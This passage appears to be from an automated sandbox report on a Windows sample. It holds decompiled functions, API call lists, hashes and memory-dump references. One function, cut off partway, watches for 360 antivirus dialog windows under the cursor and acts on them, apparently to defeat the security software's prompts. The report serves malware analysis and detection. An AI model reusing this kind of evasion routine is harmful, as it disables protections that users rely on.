						_t54 = E00CFCD41(_t84, _t84, _t104, __eflags, _a4, _a8.x, _a12);
						__eflags =  *(_t84 + 0x158);
						if( *(_t84 + 0x158) == 0) {
							 *0xe17a64( &_a8);
							_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x24c))))();
							__eflags = _t112;
							if(_t112 != 0) {
								MapWindowPoints( *(_t84 + 0x20),  *(_t112 + 0x20),  &_a8, 1);
								_t95 = (_a12 & 0x0000ffff) << 0x00000010 | _a8.x & 0x0000ffff;
								__eflags = _t95;
								_t54 = SendMessageA( *(_t112 + 0x20), 0x201, _a4, _t95);
							}
						}
						L13:
						_pop(_t105);
						_pop(_t109);
						goto L14;
					}
					_push(_a12);
					_t67 = _t84 + 0x2fc;
					_v44 = _t67;
					_t68 = PtInRect(_t67, _a8);
					__eflags = _t68;
					if(_t68 == 0) {
						goto L7;
					}
					_t71 = SendMessageA( *(E00CB277F(_t84, _t85, _t104, GetParent( *(_t84 + 0x20))) + 0x20),  *0xe87ee8, _t84,  &_v40);
					_t106 = _t84 + 0x31c;
					CopyRect(_t106,  &_v40);
					__eflags = _t71;
					if(_t71 == 0) {
						goto L7;
					}
					_t74 = IsRectEmpty(_t106);
					__eflags = _t74;
					if(_t74 != 0) {
						goto L7;
					} else {
						 *(_t84 + 0x29c) = 1;
						E00CB277F(_t84,  &_v40, _t104, SetCapture( *(_t84 + 0x20)));
						_t84 = _t84 + 0x30c;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t108 = _v48;
						E00CB9BF2(_t108, _t84);
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						SetRectEmpty( &_v24);
						 *0xe17a64(_t84,  &_v24);
						_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x2fc))))();
						goto L13;
					}
				} else {
					 *(_t84 + 0x26c) = 1;
					_t54 = E00CB277F(_t84, _t85, _t104, SetCapture( *(_t84 + 0x20)));
					L14:
					return E00DDCBCE(_t54, _t84, _v8 ^ _t117, _t104, _t105, _t109);
				}
			}

0x00d04b8e
0x00d04b8e
0x00d04b8e
0x00d04b8e
0x00d04b94
0x00d04b9b
0x00d04b9f
0x00d04ba2
0x00d04ba7
0x00d04bb9
0x00d04bd9
0x00d04be0
0x00d04be1
0x00d04be2
0x00d04cb4
0x00d04cbe
0x00d04cc8
0x00d04cca
0x00d04cda
0x00d04ce4
0x00d04cea
0x00d04cef
0x00d04cef
0x00d04cea
0x00d04cff
0x00d04d04
0x00d04d0b
0x00d04d1b
0x00d04d25
0x00d04d27
0x00d04d29
0x00d04d37
0x00d04d48
0x00d04d48
0x00d04d56
0x00d04d56
0x00d04d29
0x00d04d5c
0x00d04d5c
0x00d04d5d
0x00000000
0x00d04d5d
0x00d04be8
0x00d04beb
0x00d04bf4
0x00d04bf8
0x00d04bfe
0x00d04c00
0x00000000
0x00000000
0x00d04c23
0x00d04c2b
0x00d04c36
0x00d04c3c
0x00d04c3e
0x00000000
0x00000000
0x00d04c41
0x00d04c47
0x00d04c49
0x00000000
0x00d04c4b
0x00d04c4e
0x00d04c5f
0x00d04c67
0x00d04c70
0x00d04c71
0x00d04c72
0x00d04c73
0x00d04c74
0x00d04c79
0x00d04c80
0x00d04c83
0x00d04c86
0x00d04c89
0x00d04c90
0x00d04ca5
0x00d04cad
0x00000000
0x00d04cad
0x00d04bbb
0x00d04bbe
0x00d04bcf
0x00d04d5e
0x00d04d6a
0x00d04d6a

APIs

PtInRect.USER32(?,?,?), ref: 00D04BB1
SetCapture.USER32 ref: 00D04BC8
PtInRect.USER32(?,?,?), ref: 00D04BF8
GetParent.USER32(?), ref: 00D04C09
SendMessageA.USER32(?,?,?,00000000), ref: 00D04C23
CopyRect.USER32 ref: 00D04C36
IsRectEmpty.USER32 ref: 00D04C41
SetCapture.USER32(?,?,?,00000000), ref: 00D04C58
SetRectEmpty.USER32(?), ref: 00D04C90

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$CaptureEmpty$CopyMessageParentSend
String ID:
API String ID: 3593567511-0
Opcode ID: 9a24c6a5718ffc61963909962f2191bf78fd56748bb32f0ecceebcd2847a3bf2
Instruction ID: 6263b561e2a2f8329940f7babeb150012843c095363d8efb72a86a7895edf55b
Opcode Fuzzy Hash: 9a24c6a5718ffc61963909962f2191bf78fd56748bb32f0ecceebcd2847a3bf2
Instruction Fuzzy Hash: 8B516E71600209AFDF019F65CD88EEE7BB9FF08700F144069FD49AB2A1DB759A14DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CC8931 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 268
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CC8931(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t96;
				intOrPtr _t102;
				intOrPtr _t106;
				signed int _t113;
				void* _t114;
				intOrPtr* _t122;
				void* _t123;
				signed int _t140;
				void* _t141;
				signed char _t168;
				intOrPtr* _t170;
				intOrPtr _t216;
				intOrPtr* _t227;
				intOrPtr* _t229;
				void* _t231;
				void* _t239;

				_t228 = __esi;
				_t224 = __edx;
				_t170 = __ecx;
				_push(0x3f8);
				E00DDD55F(0xe094af, __ebx, __edi, __esi);
				_t227 = __ecx;
				_t168 = 0;
				 *((intOrPtr*)(_t231 - 0x400)) = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					E00CAA4E7(_t168, _t170, _t227, _t228, __eflags);
					asm("int3");
					_t229 = _t170;
					E00CB236A(_t168, _t170, __eflags, _t228);
					_t96 = E00CB7881(_t229);
					__eflags = _t96;
					if(_t96 != 0) {
						ReleaseCapture();
					}
					__eflags = 0;
					 *((intOrPtr*)(_t229 + 0x84)) = 0;
					 *((intOrPtr*)(_t229 + 0x8c)) = 0;
					 *((intOrPtr*)(_t229 + 0x88)) = 0;
					return RedrawWindow( *(_t229 + 0x20), 0, 0, 0x401);
				} else {
					_t102 =  *((intOrPtr*)(__ecx + 0xc0));
					if(_t102 == 0) {
						E00CA67E1(_t231 - 0x3f4);
						 *(_t231 - 4) = 2;
						E00CB2D00(_t227, _t231 - 0x3f4);
						_t106 =  *((intOrPtr*)(_t231 - 0x3f4));
						__eflags =  *(_t106 - 0xc);
						if(__eflags == 0) {
							L18:
							_t224 =  *(_t227 + 0xb0);
							_t228 =  *(_t227 + 0xac);
							_push(1);
							_push(0);
							_push(0);
							asm("sbb ecx, ecx");
							_push( ~( *( *(_t227 + 0xb0) - 0xc)) &  *(_t227 + 0xb0));
							_push( *((intOrPtr*)(_t227 + 0xb4)));
							_push(_t106);
							asm("sbb eax, eax");
							_push( ~( *( *(_t227 + 0xac) - 0xc)) &  *(_t227 + 0xac));
							_push(1);
							E00CC3100(_t168, _t231 - 0x3f0, _t227,  *(_t227 + 0xac), __eflags);
							_t178 = _t231 - 0x3f0;
							 *(_t231 - 4) = 5;
							__eflags = E00CC3B53(_t231 - 0x3f0, __eflags) - 1;
							if(__eflags != 0) {
								L20:
								 *((char*)(_t231 - 0x3f5)) = 0;
							} else {
								_push(_t231 - 0x400);
								_push(E00CC3D16(_t168, _t231 - 0x3f0, _t224, _t227, _t228, __eflags));
								_t168 = 1;
								_t111 = E00CBDEF4(_t231 - 0x3f4);
								 *((char*)(_t231 - 0x3f5)) = 1;
								_pop(_t178);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L20;
								}
							}
							__eflags = _t168 & 0x00000001;
							if((_t168 & 0x00000001) != 0) {
								_t178 =  *((intOrPtr*)(_t231 - 0x400)) - 0x10;
								E00CA2975(_t111,  *((intOrPtr*)(_t231 - 0x400)) - 0x10);
							}
							__eflags =  *((char*)(_t231 - 0x3f5));
							if(__eflags != 0) {
								_t122 = E00CC3D16(_t168, _t231 - 0x3f0, _t224, _t227, _t228, __eflags);
								 *(_t231 - 4) = 6;
								_t123 = E00CB7AE0(_t227,  *_t122);
								 *(_t231 - 4) = 5;
								E00CA2975(_t123,  *((intOrPtr*)(_t231 - 0x400)) - 0x10);
								SendMessageA( *(_t227 + 0x20), 0xb9, 1, 0);
								_t228 =  *( *_t227 + 0x170);
								 *0xe17a64(_t231 - 0x400);
								_t178 = _t227;
								 *( *( *_t227 + 0x170))();
							}
							_t113 = E00CB277F(_t168, _t178, _t224, GetParent( *(_t227 + 0x20)));
							__eflags = _t113;
							if(_t113 != 0) {
								RedrawWindow( *(E00CB277F(_t168, _t178, _t224, GetParent( *(_t227 + 0x20))) + 0x20), 0, 0, 0x481);
							}
							_t114 = E00CC33E1(_t168, _t231 - 0x3f0, _t224, _t227);
							goto L28;
						} else {
							E00DEDD45(_t106, 0, 0, 0, 0, _t231 - 0x110, 0x100, 0, 0);
							_push(_t231 - 0x110);
							E00CA2ABC(0, _t231 - 0x3fc, _t227, __esi, __eflags);
							 *(_t231 - 4) = 3;
							E00CA926D(_t231 - 0x3fc);
							E00CA92D4(_t231 - 0x3fc);
							__eflags =  *( *((intOrPtr*)(_t231 - 0x3fc)) - 0xc);
							if(__eflags == 0) {
								E00CA2C0A(0, _t231 - 0x3f4);
							}
							_push("*?<>|");
							E00CA2ABC(_t168, _t231 - 0x400, _t227, _t228, __eflags);
							 *(_t231 - 4) = 4;
							_t140 = E00DEC2D7( *((intOrPtr*)(_t231 - 0x3f4)),  *((intOrPtr*)(_t231 - 0x400)));
							__eflags = _t140;
							if(_t140 == 0) {
								L17:
								_t141 = E00CA2975(_t140,  *((intOrPtr*)(_t231 - 0x400)) - 0x10);
								 *(_t231 - 4) = 2;
								E00CA2975(_t141,  *((intOrPtr*)(_t231 - 0x3fc)) - 0x10);
								_t106 =  *((intOrPtr*)(_t231 - 0x3f4));
								goto L18;
							} else {
								_t140 = _t140 -  *((intOrPtr*)(_t231 - 0x3f4));
								__eflags = _t140;
								if(_t140 < 0) {
									goto L17;
								} else {
									_t228 =  *( *_t227 + 0x174);
									 *0xe17a64(_t231 - 0x3f4);
									_t140 =  *( *( *_t227 + 0x174))();
									__eflags = _t140;
									if(_t140 != 0) {
										goto L17;
									} else {
										E00CA2975(E00CA2975(E00CA2975(E00CB7A0A(_t168, _t227, 0),  *((intOrPtr*)(_t231 - 0x400)) - 0x10),  *((intOrPtr*)(_t231 - 0x3fc)) - 0x10),  *((intOrPtr*)(_t231 - 0x3f4)) - 0x10);
									}
								}
							}
						}
					} else {
						if(_t102 == 1) {
							_t239 =  *0xe885c8 - _t168; // 0x0
							if(_t239 != 0) {
								E00CA67E1(_t231 - 0x3f4);
								 *(_t231 - 4) = 0;
								E00CB2D00(_t227, _t231 - 0x3f4);
								E00CA67E1(_t231 - 0x3fc);
								 *(_t231 - 4) = 1;
								asm("sbb eax, eax");
								_t216 =  *0xe885c8; // 0x0
								if(E00D1DF2E(_t216, _t231 - 0x3fc, _t227,  *((intOrPtr*)(_t231 - 0x3f4)),  ~( *( *(_t227 + 0xb8) - 0xc)) &  *(_t227 + 0xb8),  *((intOrPtr*)(_t227 + 0xbc)), 0) != 0) {
									_push(_t231 - 0x3f4);
									if(E00CBDEF4(_t231 - 0x3fc) != 0) {
										E00CB7AE0(_t227,  *((intOrPtr*)(_t231 - 0x3fc)));
										SendMessageA( *(_t227 + 0x20), 0xb9, 1, 0);
										_t228 =  *( *_t227 + 0x170);
										 *0xe17a64();
										_t160 =  *( *( *_t227 + 0x170))();
									}
								}
								_t114 = E00CA2975(_t160,  *((intOrPtr*)(_t231 - 0x3fc)) - 0x10);
								L28:
								 *(_t231 - 4) =  *(_t231 - 4) | 0xffffffff;
								E00CA2975(_t114,  *((intOrPtr*)(_t231 - 0x3f4)) - 0x10);
							}
						}
						E00CB7A0A(_t168, _t227, _t224);
					}
					return E00DDD50E(_t168, _t227, _t228);
				}
			}

0x00cc8931
0x00cc8931
0x00cc8931
0x00cc8931
0x00cc893b
0x00cc8940
0x00cc8942
0x00cc8944
0x00cc894c
0x00cc8cce
0x00cc8cd3
0x00cc8cd5
0x00cc8cd7
0x00cc8cde
0x00cc8ce3
0x00cc8ce5
0x00cc8ce7
0x00cc8ce7
0x00cc8ced
0x00cc8cf9
0x00cc8cff
0x00cc8d05
0x00cc8d12
0x00cc895b
0x00cc8962
0x00cc8965
0x00cc8a43
0x00cc8a4e
0x00cc8a58
0x00cc8a5d
0x00cc8a65
0x00cc8a68
0x00cc8b7b
0x00cc8b7b
0x00cc8b81
0x00cc8b87
0x00cc8b89
0x00cc8b90
0x00cc8b92
0x00cc8b96
0x00cc8b97
0x00cc8ba3
0x00cc8ba9
0x00cc8bad
0x00cc8bae
0x00cc8bb0
0x00cc8bb5
0x00cc8bbb
0x00cc8bc4
0x00cc8bc7
0x00cc8bf7
0x00cc8bf7
0x00cc8bc9
0x00cc8bcf
0x00cc8bdb
0x00cc8be5
0x00cc8be6
0x00cc8beb
0x00cc8bf2
0x00cc8bf3
0x00cc8bf5
0x00000000
0x00000000
0x00cc8bf5
0x00cc8bfe
0x00cc8c01
0x00cc8c09
0x00cc8c0c
0x00cc8c0c
0x00cc8c11
0x00cc8c18
0x00cc8c27
0x00cc8c30
0x00cc8c34
0x00cc8c3f
0x00cc8c46
0x00cc8c57
0x00cc8c5f
0x00cc8c67
0x00cc8c6d
0x00cc8c6f
0x00cc8c6f
0x00cc8c7b
0x00cc8c80
0x00cc8c82
0x00cc8c9f
0x00cc8c9f
0x00cc8cab
0x00000000
0x00cc8a6e
0x00cc8a81
0x00cc8a95
0x00cc8a96
0x00cc8aa1
0x00cc8aa5
0x00cc8ab0
0x00cc8abb
0x00cc8abf
0x00cc8ac7
0x00cc8ac7
0x00cc8acc
0x00cc8ad7
0x00cc8ae2
0x00cc8aec
0x00cc8af3
0x00cc8af5
0x00cc8b55
0x00cc8b5e
0x00cc8b69
0x00cc8b70
0x00cc8b75
0x00000000
0x00cc8af7
0x00cc8af7
0x00cc8af7
0x00cc8afd
0x00000000
0x00cc8aff
0x00cc8b01
0x00cc8b10
0x00cc8b18
0x00cc8b1a
0x00cc8b1c
0x00000000
0x00cc8b1e
0x00cc8b4a
0x00cc8b4a
0x00cc8b1c
0x00cc8afd
0x00cc8af5
0x00cc896b
0x00cc896e
0x00cc8974
0x00cc897a
0x00cc8986
0x00cc8991
0x00cc8997
0x00cc89a2
0x00cc89b4
0x00cc89bd
0x00cc89c1
0x00cc89dd
0x00cc89e5
0x00cc89f6
0x00cc8a00
0x00cc8a10
0x00cc8a18
0x00cc8a20
0x00cc8a28
0x00cc8a28
0x00cc89f6
0x00cc8a33
0x00cc8cb0
0x00cc8cb6
0x00cc8cbd
0x00cc8cbd
0x00cc897a
0x00cc8cc4
0x00cc8cc4
0x00cc8b54
0x00cc8b54

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC893B
SendMessageA.USER32(?,000000B9,00000001,00000000), ref: 00CC8A10
SendMessageA.USER32(?,000000B9,00000001,00000000), ref: 00CC8C57
GetParent.USER32(?), ref: 00CC8C74
GetParent.USER32(?), ref: 00CC8C87
RedrawWindow.USER32(?,00000000,00000000,00000481,00000000), ref: 00CC8C9F

Part of subcall function 00CB7AE0: IsWindow.USER32(?), ref: 00CB7AEE
Part of subcall function 00CB7AE0: SetWindowTextA.USER32(?,?), ref: 00CB7B0A

ReleaseCapture.USER32(?,000003F8), ref: 00CC8CE7
RedrawWindow.USER32(?,00000000,00000000,00000401,?,000003F8), ref: 00CC8D0B

Part of subcall function 00CB2D00: GetWindowTextLengthA.USER32(?), ref: 00CB2D12
Part of subcall function 00CB2D00: GetWindowTextA.USER32 ref: 00CB2D2B

Part of subcall function 00D1DF2E: SHBrowseForFolderA.SHELL32(?,?,?,00000000), ref: 00D1DFDC
Part of subcall function 00D1DF2E: SHGetPathFromIDListA.SHELL32(00000000,?,?,?,00000000), ref: 00D1DFF0
Part of subcall function 00D1DF2E: _strlen.LIBCMT ref: 00D1E001

Strings

*?<>|, xrefs: 00CC8ACC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Text$MessageParentRedrawSend$BrowseCaptureFolderFromH_prolog3_LengthListPathRelease_strlen
String ID: *?<>|
API String ID: 232291159-3491500753
Opcode ID: d314204bc91299d143b7092c1460d0fbb743eaa85ca2de2eefada98ccdb6b176
Instruction ID: 159f104fc5fdd74395ff65677159bb7475940c3db1e9ae3f09604a5cb87c216d
Opcode Fuzzy Hash: d314204bc91299d143b7092c1460d0fbb743eaa85ca2de2eefada98ccdb6b176
Instruction Fuzzy Hash: 5BB14830A5025AAFDB29EF24CC55BFEB7B9EB45304F1040A9E519A7291DF305F44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2C72 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CC2C72(intOrPtr* __ebx, void* __ecx, void* __edx, signed int* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed int* _a8, signed int _a12) {
				struct HINSTANCE__* _v8;
				intOrPtr* _v32;
				void* __ebp;
				intOrPtr* _t26;
				short _t28;
				signed short _t33;
				struct HRSRC__* _t45;
				void* _t46;
				void* _t56;
				signed int _t59;
				void* _t65;
				signed int _t70;
				void* _t75;
				void* _t79;

				_t67 = __edi;
				_t65 = __edx;
				_t53 = __ebx;
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(0xcc2dba);
				_t56 = 0xe682c4;
				_t75 = E00CADAB2(__ebx, 0xe682c4, __edi, __esi, __eflags);
				if(_t75 == 0) {
					E00CAA4E7(__ebx, 0xe682c4, __edi, _t75, __eflags);
					goto L16;
				} else {
					_t53 = _a4;
					_t28 = 0;
					if( *(_t75 + 8) != 0) {
						L12:
						_t68 =  *((intOrPtr*)(_t75 + 4));
						if( *((intOrPtr*)(_t75 + 4)) != 0) {
							_t28 = E00DEC1A0(_t68);
						}
						_push(_t28);
						E00CA2CD7(_t53, _t53, _t68, _t75, _t68);
						_t59 =  *(_t75 + 8) & 0x0000ffff;
						 *_a8 = _t59;
						return 0 | _t59 != 0x0000ffff;
					} else {
						_t33 = GetModuleHandleW(L"comctl32.dll");
						_v8 = _t33;
						if(_t33 == 0) {
							L9:
							_t67 = _a8;
						} else {
							__imp__GetUserDefaultUILanguage();
							_t70 = _a12;
							if((_t33 & 0x000003ff) != 0x11 || E00CC2DF8(_t53, _t65, _t70, _t75, "MS UI Gothic") == 0) {
								L6:
								asm("sbb edi, edi");
								_t45 = FindResourceW(_v8, ( ~_t70 & 0x0000000e) + 0x3ee, 5);
								if(_t45 == 0) {
									goto L9;
								} else {
									goto L7;
								}
							} else {
								asm("sbb eax, eax");
								_t45 = FindResourceExW(_v8, 5, ( ~_t70 & 0x0000000e) + 0x3ee, 0xfc11);
								if(_t45 != 0) {
									L7:
									_t46 = LoadResource(_v8, _t45);
									_t67 = _a8;
									_t89 = _t46;
									if(_t46 != 0) {
										E00CC24B3(_t53, _t89, _t46, _t53, _t67);
										_t79 = _t79 + 0xc;
									}
								} else {
									goto L6;
								}
							}
						}
						_t56 = GlobalAlloc(0x40, E00CAA848(_t53, _t67, _t75,  *((intOrPtr*)( *_t53 - 0xc)) + 1, 1));
						 *((intOrPtr*)(_t75 + 4)) = _t56;
						if(_t56 == 0) {
							L16:
							E00CAA501(_t53, _t56, _t67, _t75, __eflags);
							asm("int3");
							_push(_t56);
							_t26 = E00CAD897(0xc);
							_v32 = _t26;
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = 0;
								return 0;
							} else {
								 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
								__eflags = 0;
								 *_t26 = 0xe1ad6c;
								 *((short*)(_t26 + 8)) = 0;
								return _t26;
							}
						} else {
							E00CAC45A(_t53, _t67, _t75, _t56,  *((intOrPtr*)( *_t53 - 0xc)) + 1,  *_t53);
							 *(_t75 + 8) =  *_t67;
							_t28 = 0;
							goto L12;
						}
					}
				}
			}

0x00cc2c72
0x00cc2c72
0x00cc2c72
0x00cc2c75
0x00cc2c76
0x00cc2c77
0x00cc2c78
0x00cc2c79
0x00cc2c7e
0x00cc2c88
0x00cc2c8c
0x00cc2daf
0x00000000
0x00cc2c92
0x00cc2c92
0x00cc2c95
0x00cc2c9b
0x00cc2d7a
0x00cc2d7a
0x00cc2d7f
0x00cc2d82
0x00cc2d87
0x00cc2d88
0x00cc2d8c
0x00cc2d99
0x00cc2d9f
0x00cc2dac
0x00cc2ca1
0x00cc2ca6
0x00cc2cac
0x00cc2cb1
0x00cc2d3b
0x00cc2d3b
0x00cc2cb7
0x00cc2cb7
0x00cc2cbd
0x00cc2ccc
0x00cc2d00
0x00cc2d04
0x00cc2d13
0x00cc2d1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc2cdd
0x00cc2ce6
0x00cc2cf6
0x00cc2cfe
0x00cc2d1d
0x00cc2d21
0x00cc2d27
0x00cc2d2a
0x00cc2d2c
0x00cc2d31
0x00cc2d36
0x00cc2d36
0x00000000
0x00000000
0x00000000
0x00cc2cfe
0x00cc2ccc
0x00cc2d57
0x00cc2d59
0x00cc2d5e
0x00cc2db4
0x00cc2db4
0x00cc2db9
0x00cc2dbd
0x00cc2dc0
0x00cc2dc5
0x00cc2dc8
0x00cc2dca
0x00cc2dde
0x00cc2de1
0x00cc2dcc
0x00cc2dcc
0x00cc2dd0
0x00cc2dd2
0x00cc2dd8
0x00cc2ddd
0x00cc2ddd
0x00cc2d60
0x00cc2d69
0x00cc2d74
0x00cc2d78
0x00000000
0x00cc2d78
0x00cc2d5e
0x00cc2c9b

APIs

Part of subcall function 00CADAB2: __EH_prolog3_catch.LIBCMT ref: 00CADAB9

GetModuleHandleW.KERNEL32(comctl32.dll,00CC2DBA,00000000,00000000,00000000,?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2CA6
GetUserDefaultUILanguage.KERNEL32(?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2CB7
FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2CF6
FindResourceW.KERNEL32(?,?,00000005,?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2D13
LoadResource.KERNEL32(?,00000000,?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2D21

Part of subcall function 00CC2DF8: _strlen.LIBCMT ref: 00CC2E23
Part of subcall function 00CC2DF8: GetDC.USER32(00000000), ref: 00CC2E4B
Part of subcall function 00CC2DF8: EnumFontFamiliesExA.GDI32(00000000,00CBF63E,00CC2DE2,?,00000000), ref: 00CC2E66
Part of subcall function 00CC2DF8: ReleaseDC.USER32 ref: 00CC2E6E

GlobalAlloc.KERNEL32(00000040,00000000,?,?,00CBF63E,00000000,00000000,00CBE2EB,0000001C,00CBF438,00000000,00CBE2EB), ref: 00CC2D51
_strlen.LIBCMT ref: 00CC2D82

Strings

comctl32.dll, xrefs: 00CC2CA1
MS UI Gothic, xrefs: 00CC2CCE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Resource$Find_strlen$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleReleaseUser
String ID: MS UI Gothic$comctl32.dll
API String ID: 2504330361-3248924666
Opcode ID: abbfc6041276f93dcbf7b859b3e6b33f444eea6d36db621b4de0e6fce5a111b3
Instruction ID: a856a0528b3a3b834e7290aa52dee7fb538b3d9fc36a2d99e1f6d99e99db0c45
Opcode Fuzzy Hash: abbfc6041276f93dcbf7b859b3e6b33f444eea6d36db621b4de0e6fce5a111b3
Instruction Fuzzy Hash: 9641D271600606AFD714AF65DC46FBA77BDEF51B14B14842CF826EB290EA70DE40D621

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8464 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 116
sleepCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CA8464() {
				signed int _v8;
				char _v276;
				void* _v284;
				struct tagRECT _v292;
				struct tagPOINT _v308;
				signed int _t20;
				CHAR* _t48;
				intOrPtr _t49;
				intOrPtr* _t51;
				intOrPtr* _t54;
				intOrPtr* _t57;
				CHAR* _t59;
				struct HWND__* _t63;
				signed int _t64;
				signed int _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				void* _t77;

				_t66 = (_t64 & 0xfffffff8) - 0x134;
				_t20 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t20 ^ _t66;
				L1:
				while(1) {
					if(FindWindowA("Q360SafeMainClass", 0xe4c668) == 0 || GetCursorPos( &_v308) == 0) {
						L17:
						Sleep(0x64);
						continue;
					} else {
						_push(_v308.y);
						_t63 = WindowFromPoint(_v308);
						if(_t63 != 0 && _t63 != 0xffffffff) {
							GetClassNameA(_t63,  &_v276, 0x104);
							_t59 =  &_v276;
							_t48 = "#32770";
							_t49 = 0;
							while(( *(_t59 + _t49) & 0x000000ff) ==  *((intOrPtr*)(_t48 + _t49))) {
								_t49 = _t49 + 1;
								if(_t49 != 7) {
									continue;
								}
								GetWindowRect(_t63,  &_v292);
								asm("movd xmm1, eax");
								_t77 = _v292.top - _v292.bottom;
								asm("cvtdq2pd xmm1, xmm1");
								asm("movd xmm0, eax");
								asm("cvtdq2pd xmm0, xmm0");
								asm("divsd xmm1, xmm0");
								asm("comisd xmm1, [0xe4c8b8]");
								asm("movsd [esp+0x18], xmm1");
								if(_t77 >= 0) {
									asm("movsd xmm0, [0xe4c8c0]");
									asm("comisd xmm0, xmm1");
									if(_t77 >= 0) {
										E00CA6BF1();
										_t69 = _t66 - 0x18;
										_t57 = _t69;
										 *_t57 = 0;
										 *((intOrPtr*)(_t57 + 0x10)) = 0;
										 *((intOrPtr*)(_t57 + 0x14)) = 0xf;
										E00CA1DDE("360Safe.exe");
										E00CA71F7(_t48, _t59, 0);
										_t66 = _t69 + 0x18;
										E00CA6BF1();
										asm("movsd xmm1, [esp+0x18]");
									}
								}
								asm("comisd xmm1, [0xe4c898]");
								if(_t77 >= 0) {
									asm("movsd xmm0, [0xe4c8a0]");
									asm("comisd xmm0, xmm1");
									if(_t77 >= 0) {
										E00CA6BF1();
										_t68 = _t66 - 0x18;
										_t54 = _t68;
										 *_t54 = 0;
										 *((intOrPtr*)(_t54 + 0x10)) = 0;
										 *((intOrPtr*)(_t54 + 0x14)) = 0xf;
										E00CA1DDE("360Safe.exe");
										E00CA71F7(_t48, _t59, 0);
										_t66 = _t68 + 0x18;
										E00CA6BF1();
										asm("movsd xmm1, [esp+0x18]");
									}
								}
								asm("comisd xmm1, [0xe4c8a8]");
								if(_t77 >= 0) {
									asm("movsd xmm0, [0xe4c8b0]");
									asm("comisd xmm0, xmm1");
									if(_t77 >= 0) {
										E00CA6BF1();
										_t67 = _t66 - 0x18;
										_t51 = _t67;
										 *_t51 = 0;
										 *((intOrPtr*)(_t51 + 0x10)) = 0;
										 *((intOrPtr*)(_t51 + 0x14)) = 0xf;
										E00CA1DDE("360Safe.exe");
										E00CA71F7(_t48, _t59, 0);
